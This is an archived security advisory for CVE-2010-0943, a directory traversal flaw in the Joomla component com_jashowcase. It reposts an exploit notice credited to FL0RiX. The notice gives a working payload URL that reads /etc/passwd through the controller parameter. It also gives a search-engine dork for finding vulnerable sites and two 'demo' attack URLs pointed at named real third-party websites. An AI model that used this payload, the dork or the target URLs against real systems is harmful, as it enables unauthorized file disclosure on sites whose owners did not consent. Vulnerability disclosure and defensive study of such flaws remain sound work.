Topic : | Joomla Component com_jashowcase Directory Travel
|
SecurityAlert : 7096
CVE : CVE-2010-0943
CWE : CWE-22
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : FL0RiX
Published : 10.03.2010
Affected Software : | joomlart:com_jashowcase |
 Advisory Content : @~~=======================================~~@
@~~=Script : Joomla Component com_jashowcase
@~~=Author : FL0RiX
@~~=Greez : Deep-Power ,Pyske,Wretch-x & All Friends
@~~=Bug Type : Directory Traversal
@~~=Dork : inurl:"com_jashowcase "
@~~=Note : Kimseye Hakettiginden Fazla Deger Vermeyecekmissin..!!
@~~=======================================~~@
@~~=Vuln.
: http://site/ [Yol]
/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../
../../etc/passwd%00
@~~=Demos
:http://www.amedida.com.py/index.php?option=com_jashowcase&view=jashowcase&
controller=../../../../../../../etc/passwd%00
:http://www.venisondonation.com/index.php?option=com_jashowcase&view=jashow
case&controller=../../../../../../../etc/passwd%00
References :
http://xforce.iss.net/xforce/xfdb/55512
http://www.securityfocus.com/bid/37692
http://www.exploit-db.com/exploits/11090
http://secunia.com/advisories/33486
http://packetstormsecurity.org/1001-exploits/joomlajashowcase-traversal.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|